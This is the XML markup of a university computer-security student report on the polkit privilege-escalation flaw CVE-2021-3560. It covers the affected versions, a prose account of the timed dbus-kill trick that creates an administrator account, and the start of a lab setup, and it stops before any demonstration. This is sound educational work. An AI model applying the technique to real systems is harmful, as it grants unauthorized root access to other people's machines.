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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="72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210"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="7210"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="920" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:left w:color="4472c4" w:space="0" w:sz="12" w:val="single"/>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03">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Murdoch University</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="995" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:left w:color="4472c4" w:space="0" w:sz="12" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:right w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="120.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="4472c4"/>
                <w:sz w:val="78"/>
                <w:szCs w:val="78"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="4472c4"/>
                <w:sz w:val="78"/>
                <w:szCs w:val="78"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Project</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="4472c4"/>
                <w:sz w:val="78"/>
                <w:szCs w:val="78"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="4472c4"/>
                <w:sz w:val="78"/>
                <w:szCs w:val="78"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Final Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="920" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="0" w:val="nil"/>
              <w:left w:color="4472c4" w:space="0" w:sz="12" w:val="single"/>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006">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ICT287 Computer Security</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
            <w:pPr>
              <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
              <w:ind w:left="140" w:right="140" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="2f5496"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2021-3560 – Polkit Local Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>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color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chng Yi-Sheng (34492591)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tan Yi Tong (34482786)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Toh Yu En (34609986)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">21th November 2022</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rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="4472c4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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tabs>
              <w:tab w:val="right" w:leader="none" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:b w:val="1"/>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x8kln6yixb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_qx8kln6yixbr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leader="none"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p46n7fnveusj">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Explanation and Documentation of Vulnerability.</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_p46n7fnveusj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leader="none"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ahd9gpiorodl">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Setting Up the Test Environment</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_ahd9gpiorodl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leader="none"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rc3iky2mpgwn">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Demonstration of the Exploit in Action.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_rc3iky2mpgwn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leader="none" w:pos="9360"/>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ijl4898z16bp">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Mitigation and Prevention Strategies for the Exploit.</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_ijl4898z16bp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leader="none" w:pos="9360"/>
            </w:tabs>
            <w:spacing w:after="80"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cm1tmitka7zd">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Supplementary Materials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_cm1tmitka7zd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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>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26">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-3560 – Polkit Local Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qx8kln6yixbr" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This report consists of the explanation and documentation of the polkit privilege escalation vulnerability, CVE-2021-3560, setting up of the test environment for the exploit as well as step-by-step exploitation with the explanation. The vulnerability was tested on Ubuntu 20.04 with polkit version 0.105-26.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="24292f"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Polkit, a Linux toolkit was discovered that could be tricked into bypassing authorization checks by simple lines of code, resulting in unprivileged local attackers elevating their privilege to gain unauthorized access with the creation of an administrative user account. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p46n7fnveusj" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation and Documentation of Vulnerability. </w:t>
      </w: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The Linux Privilege Escalation: Polkit vulnerability, also known as CVE-2021-3560, was discovered by Kevin Backhouse in early 2021. This vulnerability enables an unprivileged local attacker to gain root privileges to the system by bypassing authentication. The highest threat posed by this vulnerability is the potential for data confidentiality and integrity to be compromised as well as system availability.</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Polkit is part of the Linux Authorisation System and is a system service that is installed by default on most Linux Distributions. It helps to determine whether a local user has the requisite permissions and authorizes the user based on their level of privilege. This also prevents any unprivileged users from executing tasks with higher privileges. For certain requests, a user with high-privilege access will be instantly allowed or denied by Polkit. However, if the user has low-level privilege access, a dialog box will appear so that only the administrator can grant authorization to the user by entering their password.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spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Polkit is a default system service installed on most Linux distributions. Its role is to handle and determine access privileges in the system. However, there is a privilege escalation vulnerability in polkit which allows an unprivileged local user to gain root privilege on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, an administrator user has more access rights as compared to an unprivileged local user. This vulnerability tricks polkit into granting normal unprivileged users access to perform administrator-privileged actions without credential checks. This flaw could be used by an unprivileged local attacker to create a new local administrator and perform higher-privileged tasks using that account.</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color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the following mainstream distributions that are vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Hat Enterprise Linux 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fedora 21 (or later)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian Testing ("Bullseye")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0e101a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 20.04 LTS ("Focal Fossa")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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This vulnerability can be easily exploited with a simple bunch of commands. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers must first send a dbus message to the accounts-daemon to request account creation with root privileges but before Polkit can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">receive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it, the command must be killed in order to destroy the unique message ID given. The timing of this is crucial. For example, if the command prompt's output shows 1 second, the attacker must kill the message in half a second. If the attacker succeeds, a new user with sudo privileges will be created as Polkit may have mistaken the account creation by a root user. This exploit can only be done by having exact and accurate timing, usually, quite a few tries are needed for this exploit to successfully work.</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spacing w:after="200" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Existence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Vulnerability in Production Systems</w:t>
      </w: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CVE-2021-3560 is a privileged escalation vulnerability in polkit, part of the Linux authorization system. This vulnerability exists on distributions that have installed ‘accountsservice’ and ‘gnome-control-center’. Any s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ystem running polkit version 0.105-26 (Debian fork of polkit), 0.113 to 0.118 is vulnerable to privilege escalation through the exploit. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovered by Github Security Lab member Kevin Backhouse, this seven-year-old privilege escalation vulnerability is triggered by starting a dbus-send command but killing its process while polkit is still processing the request. This bug tricks polkit into authorizing the request as it does not handle the error correctly and thinks the request came from a root process.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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ahd9gpiorodl" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting Up the Test Environment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*The link to the pre-setup VM image is in the Supplementary Materials section*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Required software and operating system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 20.04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
